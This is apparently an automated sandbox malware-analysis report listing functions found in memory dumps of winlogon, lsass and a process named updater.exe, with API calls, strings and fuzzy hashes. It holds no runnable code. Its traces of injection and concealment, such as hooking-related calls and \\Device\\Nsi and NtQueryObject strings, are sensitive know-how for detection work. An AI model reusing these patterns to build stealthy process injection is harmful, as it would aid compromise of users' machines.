Source File: 00000017.00000002.3323528654.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d0165e0000_winlogon.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
Instruction ID: 6af6caf33eed429f26f2400f1c1a474b57e550817839aeb2e9cd6687076bf096
Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
Instruction Fuzzy Hash: 82113032214B8082EB618F25F844359B7E5FB88B94F584222DECC07768DF3DC951C700

Function 000002D016587356 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON

Download Yara Rule

APIs

__std_exception_copy.LIBVCRUNTIME ref: 000002D01658737C

Strings

riptor at (, xrefs: 000002D016587364
ierarchy Descriptor', xrefs: 000002D016587381

Memory Dump Source

Source File: 00000017.00000002.3323124982.000002D016580000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D016580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d016580000_winlogon.jbxd

Similarity

API ID: __std_exception_copy
String ID: ierarchy Descriptor'$riptor at (
API String ID: 592178966-758928094
Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
Instruction ID: a87dbb86b00b2b98d5e7ae00f565f44d8c78c7afccc986630b2b213103a98e21
Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
Instruction Fuzzy Hash: D9E086A1640B84D0EF018F62EC8439833A4DB58B68FC89123DD5C47321FA38D5F9C300

Function 000002D016617356 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON

Download Yara Rule

APIs

__std_exception_copy.LIBVCRUNTIME ref: 000002D01661737C

Strings

riptor at (, xrefs: 000002D016617364
ierarchy Descriptor', xrefs: 000002D016617381

Memory Dump Source

Source File: 00000017.00000002.3324038371.000002D016610000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002D016610000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d016610000_winlogon.jbxd

Similarity

API ID: __std_exception_copy
String ID: ierarchy Descriptor'$riptor at (
API String ID: 592178966-758928094
Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
Instruction ID: 71643649e3df945b7771ad6b681f5c6f87c53ee6b15a755d2a1ebe7c3169b504
Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
Instruction Fuzzy Hash: 4AE086A1A40BC490DF118F62EC943D833A0DB98B64F889127995C46321FA38D5F9C300

Function 000002D0165873B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON

Download Yara Rule

APIs

__std_exception_copy.LIBVCRUNTIME ref: 000002D0165873D8

Strings

Locator', xrefs: 000002D0165873DD
riptor at (, xrefs: 000002D0165873C0

Memory Dump Source

Source File: 00000017.00000002.3323124982.000002D016580000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D016580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d016580000_winlogon.jbxd

Similarity

API ID: __std_exception_copy
String ID: Locator'$riptor at (
API String ID: 592178966-4215709766
Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
Instruction ID: dffd4c35c552f18d438efc623f6b9ab54137c7cb9bea290096256bc086aaf240
Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
Instruction Fuzzy Hash: AFE086A1600B84C0EF018F61E8802987364E758B58FC89123CA4C47321EA38D5E5C300

Function 000002D0166173B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON

Download Yara Rule

APIs

__std_exception_copy.LIBVCRUNTIME ref: 000002D0166173D8

Strings

Locator', xrefs: 000002D0166173DD
riptor at (, xrefs: 000002D0166173C0

Memory Dump Source

Source File: 00000017.00000002.3324038371.000002D016610000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002D016610000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d016610000_winlogon.jbxd

Similarity

API ID: __std_exception_copy
String ID: Locator'$riptor at (
API String ID: 592178966-4215709766
Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
Instruction ID: 04c75bb0b34fd079b1bbe548939fd58f6fcd3b84cb374ce53461770f431333a2
Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
Instruction Fuzzy Hash: 5DE086A1A00B8480DF118F61D8942987360E758B64FC89127C94C46321EA38D5E5C300

Function 000002D0165E1BF4 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000002D0165E1C2D
HeapAlloc.KERNEL32 ref: 000002D0165E1C3B
GetProcessHeap.KERNEL32 ref: 000002D0165E1C77
HeapFree.KERNEL32 ref: 000002D0165E1C85

Part of subcall function 000002D0165E152C: StrCmpIW.SHLWAPI ref: 000002D0165E155D

Memory Dump Source

Source File: 00000017.00000002.3323528654.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d0165e0000_winlogon.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
Instruction ID: 6801c8294921cadce8a74c671636f0fe5ff9b85a627fac1833d6bc37b2bfe6e2
Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
Instruction Fuzzy Hash: 7F118F25701B8481EF54DBA6E888769B3A1FB89FC1F98406ADE4D87775DE39D942C300

Function 000002D0165E1268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000002D0165E126E
HeapAlloc.KERNEL32 ref: 000002D0165E127D
GetProcessHeap.KERNEL32 ref: 000002D0165E1297
HeapAlloc.KERNEL32 ref: 000002D0165E12A8

Memory Dump Source

Source File: 00000017.00000002.3323528654.000002D0165E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D0165E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d0165e0000_winlogon.jbxd

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
Instruction ID: 68d956744345cf7861370da0470b2e65133afa0ec658b7fe96f4140d664497f0
Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
Instruction Fuzzy Hash: 57E06535A01A5486EB088FA2DC4C74A36E1FB89F06F88C024C90D07361DF7EC899CBA0

Analysis Process: updater.exePID: 6556, Parent PID: 1064COMMON

Executed Functions

Function 00007FF6569912FD Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.2172600422.00007FF656991000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF656990000, based on PE: true

Associated: 0000001A.00000002.2172554878.00007FF656990000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000001A.00000002.2172659176.00007FF656996000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000001A.00000002.2182892059.00007FF656F32000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000001A.00000002.2182932769.00007FF656F36000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000001A.00000002.2182976064.00007FF656F3B000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 0000001A.00000002.2183018870.00007FF656F3C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff656990000_updater.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c2445de3022a9d17434f7f8fda6e2b2b0e499a135514e3e3fd989fa08777e8a
Instruction ID: ba45a6bffb026c0d2546fa5f3ee40fa2507454c76d2af83e848f9c4c8aed9231
Opcode Fuzzy Hash: 7c2445de3022a9d17434f7f8fda6e2b2b0e499a135514e3e3fd989fa08777e8a
Instruction Fuzzy Hash: 18B01271F046468CE7046F06D84125C32207B16700F440430C40C63357CE7E9041C731

Analysis Process: lsass.exePID: 652, Parent PID: 2120COMMON

Execution Graph

Execution Coverage:	0.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	94
Total number of Limit Nodes:	11

Executed Functions

Function 000002D6F151253C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileType.KERNEL32 ref: 000002D6F1512620
StrCpyW.SHLWAPI ref: 000002D6F1512639

Strings

\\.\pipe\, xrefs: 000002D6F151262B

Memory Dump Source

Source File: 0000001B.00000002.3331439695.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d6f1510000_lsass.jbxd

Similarity

API ID: FileType
String ID: \\.\pipe\
API String ID: 3081899298-91387939
Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
Instruction ID: fa04f75c9475a18510419c108b79fce0653dad0fa003f1e7f796e61fbc6322b7
Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
Instruction Fuzzy Hash: A07170A6200F858AE6669F25B85C3AA6794F3857D4F64002BDD0F67F89DF39CE458700

Function 000002D6F151202C Relevance: 4.7, APIs: 1, Strings: 2, Instructions: 162
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrCmpNIW.SHLWAPI ref: 000002D6F15120C6

Part of subcall function 000002D6F1512F04: GetProcessHeap.KERNEL32 ref: 000002D6F1512F27
Part of subcall function 000002D6F1512F04: HeapAlloc.KERNEL32 ref: 000002D6F1512F3A
Part of subcall function 000002D6F1512F04: StrCmpNIW.SHLWAPI ref: 000002D6F1512FAF
Part of subcall function 000002D6F1512F04: GetProcessHeap.KERNEL32 ref: 000002D6F1513015
Part of subcall function 000002D6F1512F04: HeapFree.KERNEL32 ref: 000002D6F1513023

Strings

dialer, xrefs: 000002D6F15120BF
S, xrefs: 000002D6F15121E7

Memory Dump Source

Source File: 0000001B.00000002.3331439695.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d6f1510000_lsass.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: S$dialer
API String ID: 756756679-3873981283
Opcode ID: 10a6181ad89868b013f95f8d430f86fb0b73c76b57149a1256a42c526e771eaa
Instruction ID: 7a83d85bf80e11694d2d7db4162bf47d6d0c4d20143003a03d639ac9e943c438
Opcode Fuzzy Hash: 10a6181ad89868b013f95f8d430f86fb0b73c76b57149a1256a42c526e771eaa
Instruction Fuzzy Hash: 6D518BB6A10E248AEB62CF26F84C6AD63A5F7047C4F25951ADE1E22E85DB39CC51C740

Function 000002D6F1511A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFinalPathNameByHandleW.KERNEL32 ref: 000002D6F1511A60
StrCmpNIW.SHLWAPI ref: 000002D6F1511A7A
lstrlenW.KERNEL32 ref: 000002D6F1511A89
StrCpyW.SHLWAPI ref: 000002D6F1511A9E

Strings

\\?\, xrefs: 000002D6F1511A6E

Memory Dump Source

Source File: 0000001B.00000002.3331439695.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d6f1510000_lsass.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
Instruction ID: 1a29fbed29bbccc1987992930e6102033b0a423cd1e4e3151e2afb20eff6506f
Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
Instruction Fuzzy Hash: 14F03CA3304A8196EB608F21F8DC75967A0F758BC8F944022DA4E46D58DB7CCE8DCB00

Function 000002D6F151328C Relevance: 4.5, APIs: 3, Instructions: 43
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32 ref: 000002D6F15132AE
PathFindFileNameW.SHLWAPI ref: 000002D6F15132BD

Part of subcall function 000002D6F1513844: StrCmpNIW.SHLWAPI ref: 000002D6F151385C

Part of subcall function 000002D6F1513790: GetModuleHandleW.KERNEL32 ref: 000002D6F151379E
Part of subcall function 000002D6F1513790: GetCurrentProcess.KERNEL32 ref: 000002D6F15137CC
Part of subcall function 000002D6F1513790: VirtualProtectEx.KERNEL32 ref: 000002D6F15137EE
Part of subcall function 000002D6F1513790: GetCurrentProcess.KERNEL32 ref: 000002D6F1513809
Part of subcall function 000002D6F1513790: VirtualProtectEx.KERNEL32 ref: 000002D6F151382A

CreateThread.KERNEL32 ref: 000002D6F151330B

Part of subcall function 000002D6F1511D14: GetCurrentThread.KERNEL32 ref: 000002D6F1511D1F

Memory Dump Source

Source File: 0000001B.00000002.3331439695.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d6f1510000_lsass.jbxd

Similarity

API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
String ID:
API String ID: 1683269324-0
Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
Instruction ID: 25535357102f4341e1be78c6643d6b7c1b19e4a9101efaa7cc3453e24cb777c9
Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
Instruction Fuzzy Hash: 7811C0F1610E808EFBA2AF61F86D75922A4A7543E4F40412B990F92E90EF7CCC48C204

Function 000002D6F1511ABC Relevance: 3.1, APIs: 2, Instructions: 68
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000002D6F1511628: GetProcessHeap.KERNEL32 ref: 000002D6F1511633
Part of subcall function 000002D6F1511628: HeapAlloc.KERNEL32 ref: 000002D6F1511642
Part of subcall function 000002D6F1511628: RegOpenKeyExW.ADVAPI32 ref: 000002D6F15116B2
Part of subcall function 000002D6F1511628: RegOpenKeyExW.ADVAPI32 ref: 000002D6F15116DF
Part of subcall function 000002D6F1511628: RegCloseKey.ADVAPI32 ref: 000002D6F15116F9
Part of subcall function 000002D6F1511628: RegOpenKeyExW.ADVAPI32 ref: 000002D6F1511719
Part of subcall function 000002D6F1511628: RegCloseKey.ADVAPI32 ref: 000002D6F1511734
Part of subcall function 000002D6F1511628: RegOpenKeyExW.ADVAPI32 ref: 000002D6F1511754
Part of subcall function 000002D6F1511628: RegCloseKey.ADVAPI32 ref: 000002D6F151176F
Part of subcall function 000002D6F1511628: RegOpenKeyExW.ADVAPI32 ref: 000002D6F151178F
Part of subcall function 000002D6F1511628: RegCloseKey.ADVAPI32 ref: 000002D6F15117AA
Part of subcall function 000002D6F1511628: RegOpenKeyExW.ADVAPI32 ref: 000002D6F15117CA

Sleep.KERNEL32 ref: 000002D6F1511AD7
SleepEx.KERNELBASE ref: 000002D6F1511ADD

Part of subcall function 000002D6F1511628: RegCloseKey.ADVAPI32 ref: 000002D6F15117E5
Part of subcall function 000002D6F1511628: RegOpenKeyExW.ADVAPI32 ref: 000002D6F1511805
Part of subcall function 000002D6F1511628: RegCloseKey.ADVAPI32 ref: 000002D6F1511820
Part of subcall function 000002D6F1511628: RegOpenKeyExW.ADVAPI32 ref: 000002D6F1511840
Part of subcall function 000002D6F1511628: RegCloseKey.ADVAPI32 ref: 000002D6F151185B
Part of subcall function 000002D6F1511628: RegOpenKeyExW.ADVAPI32 ref: 000002D6F151187B
Part of subcall function 000002D6F1511628: RegCloseKey.ADVAPI32 ref: 000002D6F1511896
Part of subcall function 000002D6F1511628: RegCloseKey.ADVAPI32 ref: 000002D6F15118A0

Memory Dump Source

Source File: 0000001B.00000002.3331439695.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d6f1510000_lsass.jbxd

Similarity

API ID: CloseOpen$HeapSleep$AllocProcess
String ID:
API String ID: 1534210851-0
Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
Instruction ID: fabcacca4273e522b4c4af737a3624ee53845b919a9d6f50b07f832e41c12ee0
Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
Instruction Fuzzy Hash: 4A31BDE1210E4599EF529F36F6CD3A923A5BB44BD0F0854679E0FA7E95EE1CCC51C210

Function 000002D6F14E273C Relevance: 1.7, APIs: 1, Instructions: 187
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 000002D6F14E285E

Memory Dump Source

Source File: 0000001B.00000002.3331385456.000002D6F14E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F14E0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d6f14e0000_lsass.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
Instruction ID: 2a527126fa6660018da58d358d37c763bfb819c27c69be159df49911753554d9
Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
Instruction Fuzzy Hash: BB61D472B01A908BDB54CF15A44CB2D7392FB94BE4F58912ADE5A07B8CDA3CDD52C700

Function 000002D6F157D6CC Relevance: 1.3, APIs: 1, Instructions: 36
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapAlloc.KERNEL32 ref: 000002D6F157D721

Memory Dump Source

Source File: 0000001B.00000002.3331708913.000002D6F1570000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1570000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d6f1570000_lsass.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: dd9fd347fe8d251c64e9f03e0b9c8ce045e185238ab486bcf6df9ff2ab176017
Instruction ID: 8d65d80c47894129daed010ab02c0d2d8836aa8ea5412bcfd2d6647ab8bdc98c
Opcode Fuzzy Hash: dd9fd347fe8d251c64e9f03e0b9c8ce045e185238ab486bcf6df9ff2ab176017
Instruction Fuzzy Hash: 36F090D8311E884DFF545762B51F39592905B88BC0F0C92374D0F86FC2EE1CCC818620

Non-executed Functions

Function 000002D6F1512B2C Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 000002D6F1512BD0
lstrlenW.KERNEL32 ref: 000002D6F1512E0A

Part of subcall function 000002D6F151199C: OpenProcess.KERNEL32 ref: 000002D6F15119C2
Part of subcall function 000002D6F151199C: K32GetModuleFileNameExW.KERNEL32 ref: 000002D6F15119E0
Part of subcall function 000002D6F151199C: PathFindFileNameW.SHLWAPI ref: 000002D6F15119EF
Part of subcall function 000002D6F151199C: lstrlenW.KERNEL32 ref: 000002D6F15119FB
Part of subcall function 000002D6F151199C: StrCpyW.SHLWAPI ref: 000002D6F1511A0E
Part of subcall function 000002D6F151199C: CloseHandle.KERNEL32 ref: 000002D6F1511A1C

GetProcAddress.KERNEL32 ref: 000002D6F1512BE5

Part of subcall function 000002D6F151152C: StrCmpIW.SHLWAPI ref: 000002D6F151155D

Part of subcall function 000002D6F1513844: StrCmpNIW.SHLWAPI ref: 000002D6F151385C

StrCmpNIW.SHLWAPI ref: 000002D6F1512C28
lstrlenW.KERNEL32 ref: 000002D6F1512D50

Strings

\Device\Nsi, xrefs: 000002D6F1512C1B
ntdll.dll, xrefs: 000002D6F1512BC9
NtQueryObject, xrefs: 000002D6F1512BDB

Memory Dump Source

Source File: 0000001B.00000002.3331439695.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d6f1510000_lsass.jbxd

Similarity

API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
String ID: NtQueryObject$\Device\Nsi$ntdll.dll
API String ID: 2119608203-3850299575
Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
Instruction ID: e52bf68b31deb3b75f098f43a4d7db34dffa5d04e032c03eec0775e701bb4258
Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
Instruction Fuzzy Hash: B0B17CA2210E908EEB668F25E44C7A963A5F744BD4F64511BEE0E67F94DF38CC81C740

Function 000002D6F1572B2C Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 000002D6F1572BD0
lstrlenW.KERNEL32 ref: 000002D6F1572E0A

Part of subcall function 000002D6F157199C: OpenProcess.KERNEL32 ref: 000002D6F15719C2
Part of subcall function 000002D6F157199C: K32GetModuleFileNameExW.KERNEL32 ref: 000002D6F15719E0
Part of subcall function 000002D6F157199C: PathFindFileNameW.SHLWAPI ref: 000002D6F15719EF
Part of subcall function 000002D6F157199C: lstrlenW.KERNEL32 ref: 000002D6F15719FB
Part of subcall function 000002D6F157199C: StrCpyW.SHLWAPI ref: 000002D6F1571A0E
Part of subcall function 000002D6F157199C: CloseHandle.KERNEL32 ref: 000002D6F1571A1C

GetProcAddress.KERNEL32 ref: 000002D6F1572BE5

Part of subcall function 000002D6F157152C: StrCmpIW.SHLWAPI ref: 000002D6F157155D

Part of subcall function 000002D6F1573844: StrCmpNIW.SHLWAPI ref: 000002D6F157385C

StrCmpNIW.SHLWAPI ref: 000002D6F1572C28
lstrlenW.KERNEL32 ref: 000002D6F1572D50

Strings

\Device\Nsi, xrefs: 000002D6F1572C1B
NtQueryObject, xrefs: 000002D6F1572BDB
ntdll.dll, xrefs: 000002D6F1572BC9

Memory Dump Source

Source File: 0000001B.00000002.3331708913.000002D6F1570000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1570000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d6f1570000_lsass.jbxd

Similarity

API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
String ID: NtQueryObject$\Device\Nsi$ntdll.dll
API String ID: 2119608203-3850299575
Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
Instruction ID: 7139f5732e3396e9ce4a67c786d1cdd1f51a6eb8d408f2f6df613c620b1bfdca
Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
Instruction Fuzzy Hash: B9B18DA2220E988EEB648F25E44D7A963A5F744BD4F44901BEE4E57F98DB38CC81C740

Function 000002D6F1517D90 Relevance: 10.6, APIs: 7, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 000002D6F1517DAC
RtlCaptureContext.NTDLL ref: 000002D6F1517DD9
RtlLookupFunctionEntry.NTDLL ref: 000002D6F1517DF3
RtlVirtualUnwind.NTDLL ref: 000002D6F1517E34
IsDebuggerPresent.KERNEL32 ref: 000002D6F1517E88
SetUnhandledExceptionFilter.KERNEL32 ref: 000002D6F1517EA9
UnhandledExceptionFilter.KERNEL32 ref: 000002D6F1517EB4

Memory Dump Source

Source File: 0000001B.00000002.3331439695.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d6f1510000_lsass.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
Instruction ID: 2c2ab99ae258e3bf0c478ecf6a228b1e325b8175137ff9dca730b23599cdb4cd
Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
Instruction Fuzzy Hash: 97311AB2205E808AEB609F64F8887ED7364F785788F44442ADA4E57B95EF38CA48C710

Function 000002D6F1577D90 Relevance: 10.6, APIs: 7, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 000002D6F1577DAC
RtlCaptureContext.NTDLL ref: 000002D6F1577DD9
RtlLookupFunctionEntry.NTDLL ref: 000002D6F1577DF3
RtlVirtualUnwind.NTDLL ref: 000002D6F1577E34
IsDebuggerPresent.KERNEL32 ref: 000002D6F1577E88
SetUnhandledExceptionFilter.KERNEL32 ref: 000002D6F1577EA9
UnhandledExceptionFilter.KERNEL32 ref: 000002D6F1577EB4

Memory Dump Source

Source File: 0000001B.00000002.3331708913.000002D6F1570000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1570000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d6f1570000_lsass.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
Instruction ID: a7c6be586ec6daad7d7cccc920bb91253376a8a92bbddd5b54f1ec8431f2a026
Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
Instruction Fuzzy Hash: 083109B2215F848AEB609F61F8987ED6364F784794F44442BDA4E57A98EF38CA48C710

Function 000002D6F151D2A4 Relevance: 9.1, APIs: 6, Instructions: 83COMMON

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 000002D6F151D31D
RtlLookupFunctionEntry.NTDLL ref: 000002D6F151D335
RtlVirtualUnwind.NTDLL ref: 000002D6F151D370
IsDebuggerPresent.KERNEL32 ref: 000002D6F151D3A9
SetUnhandledExceptionFilter.KERNEL32 ref: 000002D6F151D3B3
UnhandledExceptionFilter.KERNEL32 ref: 000002D6F151D3BE

Memory Dump Source

Source File: 0000001B.00000002.3331439695.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d6f1510000_lsass.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
Instruction ID: 58eb25c51ad3c38e9823b02ddc7af6a39282a3411e5fadb664d5dd80ce479239
Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
Instruction Fuzzy Hash: BB315D76214F808AEB60CF25F88839E73A4F789794F500126EA9E57B99DF3CC945CB00

Function 000002D6F157D2A4 Relevance: 9.1, APIs: 6, Instructions: 83COMMON

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 000002D6F157D31D
RtlLookupFunctionEntry.NTDLL ref: 000002D6F157D335
RtlVirtualUnwind.NTDLL ref: 000002D6F157D370
IsDebuggerPresent.KERNEL32 ref: 000002D6F157D3A9
SetUnhandledExceptionFilter.KERNEL32 ref: 000002D6F157D3B3
UnhandledExceptionFilter.KERNEL32 ref: 000002D6F157D3BE

Memory Dump Source

Source File: 0000001B.00000002.3331708913.000002D6F1570000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1570000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2d6f1570000_lsass.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
Instruction ID: 71c1c438ad0520bc105e9bc1bd8316424f0db28fcde3cf29310aaddd8912c456
Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
Instruction Fuzzy Hash: A6314E72214F848AEB608F25F84939E73A4F7897A4F504127EA9E47B54DF3CC945CB00

